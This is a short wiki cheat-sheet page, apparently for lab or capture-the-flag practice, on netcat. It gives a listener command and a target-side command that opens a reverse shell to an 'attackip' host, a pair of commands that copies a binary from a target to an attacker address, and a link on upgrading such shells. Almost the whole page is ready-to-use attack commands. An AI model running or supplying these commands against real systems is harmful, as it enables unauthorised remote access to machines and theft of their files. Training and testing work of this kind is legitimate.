Reverse shell with netcat

From RHS Wiki
Jump to navigation Jump to search
# Attacbox:
nc -lvnp 4444

# Target:
nc attackip 4444 -e /bin/sh

Transfer file over netcat[edit]

$ nc -l -p 9999 > ovrfl  # Receive (Atacker Machine)
$ nc -w 5 10.10.14.22 9999 < /usr/local/bin/ovrflw  # Send (Target machine)
$ 0e531949d891fd56a2ead07610cc5ded  ovrfl # Check it is the same on both machines

Upgrading netcat shells[edit]

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method3upgradingfromnetcatwithmagic